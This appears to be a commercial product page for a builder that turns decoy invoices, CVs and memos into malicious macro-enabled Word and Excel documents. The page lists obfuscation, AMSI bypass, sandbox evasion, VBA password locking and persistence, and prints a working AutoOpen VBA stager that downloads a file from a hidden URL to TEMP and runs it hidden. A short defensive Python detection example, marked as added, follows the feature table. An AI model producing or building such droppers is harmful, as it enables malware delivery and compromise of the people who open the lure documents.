A macro-enabled Office document (.docm for Word, .xlsm for Excel) is a ZIP-based Office Open XML container with an extra vbaProject.bin stream holding compiled VBA. When the user enables content, Office's VBA engine resolves auto-trigger handlers (AutoOpen, Document_Open, Workbook_Open, Auto_Open) and runs them.
Exploit Builder injects a hardened, obfuscated VBA module into authentic-looking template documents, applies a VBA project password to defeat casual inspection, and outputs a deliverable file ready for distribution.
vbaProject.bin dir-stream protected. Embedded payload (Base64-chunked) or remote URL; the builder picks the strategy by payload size.
Choose decoy template: invoice, CV, financial report, internal memo. Builder bundles realistic visual content.
Trigger (AutoOpen / Document_Open / event-based), AMSI bypass, sandbox checks, password.
Output is a .docm or .xlsm with VBA project password applied. Ready for delivery.
Builder writes a fully spec-compliant OOXML ZIP with [Content_Types].xml, word/document.xml (Word) or xl/workbook.xml (Excel), and a properly serialized vbaProject.bin CFB stream.
Sets the DPB protection in the PROJECT/dir streams of the CFB. Defeats casual VBA-editor inspection and most tooling that doesn't unwrap the password.
Choose: AutoOpen (Word/Excel), Document_Open, Workbook_Open, AutoExec, or event-driven (Application_DocumentBeforeClose for delayed trigger).
Optional AMSI provider hook patching for on-host detonation testing. Used solely in lab/research scenarios — disabled by default.
Per-build XOR/array obfuscation, indirect COM resolution (CallByName), JIT decryption of constants, comment/whitespace polymorphism.
Authentic-looking visual content (invoice line items, CV body, balance sheet) so the document looks legitimate when the user reviews it post-enable.
```vb
Sub AutoOpen()
    Dim u As String, t As String
    u = Dec("a4..f8", k) ' decrypt URL
    t = Environ("TEMP") & "\u.tmp"
    With CreateObject("MSXML2.XMLHTTP.6.0")
        .Open "GET", u, False: .Send
        Set s = CreateObject("ADODB.Stream")
        s.Type = 1: s.Open: s.Write .responseBody
        s.SaveToFile t, 2
    End With
    Shell t, vbHide
End Sub
```
| Output Formats | .docm (Word) · .xlsm (Excel) |
|---|---|
| Office Compatibility | Office 2010 / 2013 / 2016 / 2019 / 2021 / Microsoft 365 |
| Trigger Handlers | AutoOpen · Document_Open · Workbook_Open · AutoExec · Event-driven |
| VBA Protection | Project password (DPB) — locks VBA editor inspection |
| Delivery Mode | URL stager (HTTPS via XMLHTTP) · Local embed (Base64-chunked inside the VBA module) |
| Obfuscation | String XOR · Array dispatch · CallByName indirection · Polymorphic layout |
| Decoy Templates | Invoice · CV · Financial report · Internal memo · Custom upload |
| Anti-Analysis | Cursor activity · Recent docs · Hostname filter · Sleep skewing |
| Persistence | Optional Word/Excel STARTUP folder drop |
Authorized internal awareness campaigns where the lure is an invoice/CV/memo — measures click + enable-content rates.
Generate corpus to validate Sigma/YARA rules over vbaProject.bin, OOXML structure, and Office child-process telemetry.
Feed varied macro samples to detonation environments to measure VBA emulator coverage and AMSI integration.
Demonstrate the danger of "Enable Content" in a controlled environment with measurable outcomes.
Use against legacy environments where Office macros are still permitted and the Mark-of-the-Web protections are weak.
Reproduce TTPs from MuddyWater, Kimsuky, FIN7, TA505 macro campaigns for purple-team validation.
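The two detection angles named above (OOXML structure and Office child-process telemetry), as an added example that is not part of the builder or this page: a static check that lists vbaProject.bin parts and their declared content type, and a process-creation rule for an Office host launching an image out of a Temp directory, which is what a stager that writes to Environ("TEMP") and calls Shell produces. The container and the events are constructed stand-ins; the field names `parent` and `image` are assumptions.

```python
import io
import zipfile
from pathlib import PureWindowsPath

# Content type that a .docm/.xlsm registers for its vbaProject.bin part.
VBA_CONTENT_TYPE = "application/vnd.ms-office.vbaProject"
OFFICE_HOSTS = {"winword.exe", "excel.exe"}


def macro_parts(doc_bytes):
    """Static triage: list vbaProject.bin parts in an OOXML container and
    whether [Content_Types].xml declares the VBA content type for them."""
    with zipfile.ZipFile(io.BytesIO(doc_bytes)) as zf:
        parts = [n for n in zf.namelist() if n.lower().endswith("vbaproject.bin")]
        types_xml = zf.read("[Content_Types].xml").decode("utf-8", "replace")
    return {"parts": parts, "declared": VBA_CONTENT_TYPE in types_xml}


def office_spawned_from_temp(event):
    """Telemetry rule: an Office host is the parent and the child image lives
    under a Temp directory (the drop-to-TEMP-then-Shell pattern)."""
    parent = PureWindowsPath(event["parent"]).name.lower()
    return parent in OFFICE_HOSTS and "\\temp\\" in event["image"].lower()


def build_sample_container(with_vba):
    """Constructed stand-in for a .docm (the CFB part is only a header, no VBA)."""
    overrides = ['<Override PartName="/word/document.xml" '
                 'ContentType="application/vnd.ms-word.document.macroEnabled.main+xml"/>']
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("word/document.xml", "<w:document/>")
        if with_vba:
            overrides.append('<Override PartName="/word/vbaProject.bin" '
                             'ContentType="%s"/>' % VBA_CONTENT_TYPE)
            zf.writestr("word/vbaProject.bin", b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1" + bytes(8))
        zf.writestr("[Content_Types].xml",
                    '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">'
                    + "".join(overrides) + "</Types>")
    return buf.getvalue()


SAMPLE_EVENTS = [  # constructed process-creation events (Sysmon event ID 1 style)
    {"parent": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "image": r"C:\Users\alice\AppData\Local\Temp\u.tmp"},
    {"parent": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "image": r"C:\Windows\splwow64.exe"},  # benign print-spooler helper
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Users\alice\AppData\Local\Temp\setup.exe"},  # not Office-parented
]

if __name__ == "__main__":
    print(macro_parts(build_sample_container(True)))
    print([e["image"] for e in SAMPLE_EVENTS if office_spawned_from_temp(e)])
```

The static check only says a VBA project is present; the telemetry rule is the one that distinguishes an enabled stager from a document that was merely opened.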
All tiers include unlimited builds for both Word and Excel, every decoy template, full VBA-password protection, and updates within the term.
Bundle option. Need multiple builders? The All Modules Bundle covers every builder + both launchers at a steep discount.
Pick a tier above or talk to us — we'll match the right configuration to your engagement.